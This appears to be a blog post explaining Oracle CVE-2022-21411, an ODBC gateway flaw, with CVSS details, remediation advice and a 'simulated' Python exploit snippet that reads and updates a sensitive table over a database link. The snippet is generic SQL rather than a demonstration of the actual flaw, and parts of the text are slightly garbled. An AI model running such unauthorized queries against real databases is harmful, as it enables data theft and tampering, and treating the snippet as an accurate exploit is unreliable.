If you’re working with Oracle databases, especially Oracle Database Server versions 12.1..2, 19c, or 21c, you need to hear about CVE-2022-21411. This vulnerability affects the RDBMS Gateway / Generic ODBC Connectivity component, and even low-privileged attackers could exploit it to mess with your data.
In this post, we’ll explain the vulnerability in plain language, show how it works, and give you everything you need to know to protect your valuable database assets.
What is CVE-2022-21411?
CVE-2022-21411 is a security flaw in Oracle Database Server’s RDBMS Gateway / Generic ODBC Connectivity. Oracle’s RDBMS Gateway helps Oracle databases talk to other databases using ODBC (Open Database Connectivity).
The vulnerable part is how Oracle handles certain database connections via the gateway. An attacker with basic privileges (just “Create Session” access) and network connectivity can exploit this bug to:
Update, insert, or delete data without permission
CVSS Score: 5.4
Attack Vector: Network
Privileges Required: Low (just Create Session)
User Interaction: None (fully remote, no tricking users)
Oracle advisory link:
Oracle Critical Patch Update Advisory - April 2022
12.1..2
- 19c
- 21c
If you have the RDBMS Gateway / Generic ODBC Connectivity installed and exposed to the network, you are at risk.
The Gist
The vulnerability allows the attacker to abuse ODBC Gateway features to run unauthorized SQL statements—like reading data, or changing/deleting data—across databases. The flaw is that some security checks are missing or not enforced strictly enough when using the gateway.
Sample Exploit Workflow
Here’s a simplified Python example using Oracle’s cx_Oracle library. This example assumes the attacker has valid low-level credentials.
import cx_Oracle
# Connect to the vulnerable Oracle Database Gateway
connection = cx_Oracle.connect("user/password@dbhost:1521/sid")
cursor = connection.cursor()
# Exploit: Using the ODBC Gateway to run unauthorized SELECT or UPDATE
# For demo, trying to read sensitive data the user shouldn't access
# Below, 'link' is the DB link to ODBC data source
sql = "SELECT * FROM sensitive_table@odbc_link"
try:
cursor.execute(sql)
for row in cursor:
print(row) # Exfiltrate data
except Exception as e:
print(f'Failed to access: {e}')
# You might also try unauthorized updates
update_sql = "UPDATE sensitive_table@odbc_link SET salary = 10000 WHERE user = 'admin'"
try:
cursor.execute(update_sql)
connection.commit()
print("Data changed successfully!")
except Exception as e:
print(f'Update failed: {e}')
cursor.close()
connection.close()
Note: This is a simulated attack. The real vulnerability can be more complex, but this shows how easily a basic user could poke at data via the gateway.
Launch further attacks against your infrastructure if sensitive data is exposed.
This is particularly dangerous in environments where legacy systems or external databases are linked by ODBC, as these often contain high-value or sensitive records.
Remediation
Oracle released patches for all supported versions.
Apply the April 2022 Critical Patch Update for your Oracle Database *immediately*.
Oracle Patch Download page:
Oracle Patch Downloads
Further Reading
- National Vulnerability Database Entry for CVE-2022-21411
- Oracle CPU April 2022 advisory
- Oracle Document: RDBMS Gateway Security
- Exploit details on Exploit-DB (search CVE-2022-21411)
Summary
CVE-2022-21411 is a serious Oracle ODBC gateway flaw. If you use Oracle databases and expose RDBMS Gateway / Generic ODBC Connectivity, patch as soon as possible. Attackers only need a basic account and network access—they don’t need to trick anyone or escalate privileges. Left unpatched, your sensitive data is at risk.
Timeline
Published on: 04/19/2022 21:15:00 UTC
Last modified on: 04/27/2022 17:46:00 UTC